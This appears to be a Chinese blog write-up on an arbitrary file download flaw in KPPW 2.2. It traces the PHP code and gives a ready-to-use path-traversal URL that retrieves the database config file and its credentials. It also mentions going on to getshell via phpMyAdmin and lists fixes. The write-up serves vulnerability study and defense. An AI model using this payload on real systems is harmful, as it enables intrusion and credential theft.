KPPW2.2 漏洞利用--文件下载
任意文件下载漏洞
环境搭建
1,集成环境简单方便,如wamp,phpstudy....
2,KPPW v2.2源码一份(文末有分享)放到WWW目录下面
3,安装,访问(http://127.0.0.1/test/KPPW2.2UTF8/install/index.php)(如果显示500错误 Internal Server Error ,须将目录下面的 .htaccess 文件删除),选择下一步,下一步,填写数据库信息,后台管理员账号密码等等。
上述,漏洞复现平台搭建成功。
首页(http://127.0.0.1/test/KPPW2.2UTF8/index.php)。
漏洞分析
任意文件下载漏洞
Web应用程序中提供的文件下载接口对用户提交的数据过滤不严格,导致黑客可以通过构造相对路径,文件后缀等方式,将其他文件传入文件下载接口中,并利用该方式非法获取服务器数据。
本次漏洞根源位于 /control/ajax/ajax_file.php,代码如下:
<?php defined ( 'IN_KEKE' ) or exit('Access Denied');
switch ($ajax){
case "load":
if($work_id){
$file_ids = db_factory::get_count(sprintf(" select work_file from %switkey_task_work where work_id='%d'",TABLEPRE,$work_id));
$file_list = keke_task_class::get_work_file($file_ids);
}
break;
case "download":
keke_file_class::file_down($file_name, $file_path);
break;
case "delete":
$res = keke_file_class::del_att_file($file_id, $filepath);
$res and kekezu::echojson ( '', '1' ) or kekezu::echojson ( '', '0' );
die ();
break;
switch有四个选项,分别为:load 、download 、delete 、del 。
变量$ajax 传过来哪个值,就会执行哪部分的代码,比如传过来的值为 download,则就会执行下载模块下的代码。
在 download 选项中,可以看到,有文件名和文件路径的参数:
case "download":
keke_file_class::file_down($file_name, $file_path);
break;
我们继续跟进 file_down 这个函数,它位于 lib/helper/keke_file_class.php ,188 行 代码如下:
static function file_down($file_name, $file_path) {
keke_lang_class::load_lang_class ( 'keke_file_class' );
global $_lang;
if($file_name&&$file_path){
if(strpos($file_path, 'data/uploads/') !== false ){
$filename = S_ROOT . $file_path;
if (! file_exists ( $filename ) || strrpos ( $filename, ".php" ) !== false) {
kekezu::show_msg ( $_lang ['file_not_exist'], $_SERVER ['HTTP_REFERER'], "3" );
}
$downfilename = str_replace ( ' ', '%20', $file_name );
Header ( "Content-type: application/octet-stream" );
Header ( "Accept-Ranges: bytes" );
Header ( "Accept-Length: " . filesize ( $filename ) );
Header ( "Content-Disposition: attachment; filename=" . $downfilename );
$file = fopen ( $filename, "r" );
echo fread ( $file, filesize ( $filename ) );
fclose ( $file );
die ();
}else{
kekezu::show_msg ( $_lang ['file_not_exist'], $_SERVER ['HTTP_REFERER'], "3" );
}
}else{
kekezu::show_msg ( $_lang ['file_not_exist'], $_SERVER ['HTTP_REFERER'], "3" );
}
}
可以看到,系统首先将文件名称和文件路径传入,下面判断,如果在传入的路径中,没有 data/uploads ,则跳出循环。
它这里就限制了只能下载 uploads 下的文件。
接下来拼接字符串,形成一个新路径。接下来继续判断,如果文件名不存在,或者文件后缀名为 .php ,就会终止下载。
如果满足以上所有条件,就执行下载操作。
通过以上分析,得知它首先限制了路径,并限制了包含 php 文件的下载。
但是代码中忽略了一点,我们下载文件不一定是通过绝对路径下载,还可以通过相对路径下载文件。
我们可以在 data/uploads 后使用相对路径。就可以跳到前面的文件夹中,这样既包含了 data/uploads 字符串,符合代码规范,又可以跳到任意的文件夹。
因此我们可以利用相对路径构造 payload,如下:
http://127.0.0.1/index.php?do=ajax&view=file&ajax=download&file_name=config.inc.php&file_path=data/uploads/../../config/config.inc.phP
这样可以下载到数据库配置文件。
这里就详细解释一下里面的参数,do,view,ajax,file_name,file_path。
首先看下入口 /index.php 第46行
$log_account=null;
if(isset($_COOKIE['log_account'])){
$log_account = $_COOKIE['log_account'];
}
$square_open = $plug_arr['square']['status'];
kekezu::redirect_second_domain();
include S_ROOT . 'control/' . $do . '.php'; #第46
include 进行包含,这里根据 do 的参数的值的不同而包含 control 目录下不同的文件,payload里面的 do 等于 ajax,因此是进行包含 control 目录下的 ajax.php
接下来追踪到 /control/ajax.php
<?php defined ( 'IN_KEKE' ) or exit('Access Denied');
$_K['is_rewrite'] = 0 ;
$views = array('prom','ajax','upload','indus','score','code','share','menu','message','file','task','shop');
in_array($view,$views) or $view ="ajax";
require 'ajax/ajax_'.$view.'.php';
这里看下第三行 views 参数
这里的 views 是一个数组,下面的 require 函数是进行包含调用文件,总体来说就是从数组 views 里面选出来一个值,进而包含这个文件。
例如,当参数 views=file,下面就会包含 ajax/ajax_file.php 文件。
这样的话就回到了刚开始的分析的 /control/ajax/ajax_file.php 文件。
<?php defined ( 'IN_KEKE' ) or exit('Access Denied');
switch ($ajax){
case "load":
if($work_id){
$file_ids = db_factory::get_count(sprintf(" select work_file from %switkey_task_work where work_id='%d'",TABLEPRE,$work_id));
$file_list = keke_task_class::get_work_file($file_ids);
}
break;
case "download":
keke_file_class::file_down($file_name, $file_path);
break;
case "delete":
$res = keke_file_class::del_att_file($file_id, $filepath);
$res and kekezu::echojson ( '', '1' ) or kekezu::echojson ( '', '0' );
die ();
break;
这里是 ajax 参数,我们这里让 ajax 参数的值是 download,就会触发 file_down() 函数。
第四个参数file_name和第五个参数file_path,其中 file_name 是我们自定义的文件名称,file_path 是下载的文件路径。
也就是这里任意下载的文件,我们可以重新命名下载到本地。
追踪 file_down() 函数,它位于 lib/helper/keke_file_class.php ,188 行 代码如下:
static function file_down($file_name, $file_path) {
keke_lang_class::load_lang_class ( 'keke_file_class' );
global $_lang;
if($file_name&&$file_path){
if(strpos($file_path, 'data/uploads/') !== false ){
$filename = S_ROOT . $file_path;
if (! file_exists ( $filename ) || strrpos ( $filename, ".php" ) !== false) {
kekezu::show_msg ( $_lang ['file_not_exist'], $_SERVER ['HTTP_REFERER'], "3" );
}
$downfilename = str_replace ( ' ', '%20', $file_name );
Header ( "Content-type: application/octet-stream" );
Header ( "Accept-Ranges: bytes" );
Header ( "Accept-Length: " . filesize ( $filename ) );
Header ( "Content-Disposition: attachment; filename=" . $downfilename );
$file = fopen ( $filename, "r" );
echo fread ( $file, filesize ( $filename ) );
fclose ( $file );
die ();
}else{
kekezu::show_msg ( $_lang ['file_not_exist'], $_SERVER ['HTTP_REFERER'], "3" );
}
}else{
kekezu::show_msg ( $_lang ['file_not_exist'], $_SERVER ['HTTP_REFERER'], "3" );
}
}
可以看到,系统首先将文件名称和文件路径传入,下面判断,如果在传入的路径中,没有 data/uploads ,则跳出循环。
它这里就限制了只能下载 uploads 下的文件。接下来拼接字符串,形成一个新路径。接下来继续判断,如果文件名不存在,或者文件后缀名为 .php ,就会终止下载。
如果满足以上所有条件,就执行下载操作。
通过以上分析,得知它首先限制了路径,并限制了包含 php 文件的下载。
但是代码中忽略了一点,我们下载文件不一定是通过绝对路径下载,还可以通过相对路径下载文件,利用 ../ 下载到上级目录的文件。
我们可以在 data/uploads 后使用相对路径。就可以跳到前面的文件夹中,这样既包含了 data/uploads 字符串,符合代码规范,又可以跳到任意的文件夹。
因此,我们构造了 payload 进而触发漏洞。
http://127.0.0.1/index.php?do=ajax&view=file&ajax=download&file_name=config.inc.php&file_path=data/uploads/../../config/config.inc.phP
漏洞利用
利用 hackbar ,输入 payload :
http://127.0.0.1/test/KPPW2.2UTF8/index.php?do=ajax&view=file&ajax=download&file_name=config.inc.php&file_path=data/uploads/../../config/config.inc.phP
成功下载了文件,并获取了数据库账号密码。
接下来可以通过远程连接数据库进行渗透,如:通过phpmyadmin 进行 getshell ,或者远程连接数据库获取更多的有用信息。
漏洞修复
- 过滤点(.)使用户在url中不能回溯上级目录
- 正则严格判断用户输入参数的格式
- php.ini 配置open_basedir限定文件访问范围
源码链接(链接: https://pan.baidu.com/s/1bqiSorH 密码: mk48)
本文链接(http://www.cnblogs.com/Oran9e/p/8259879.html),转载请注明。
任重而道远!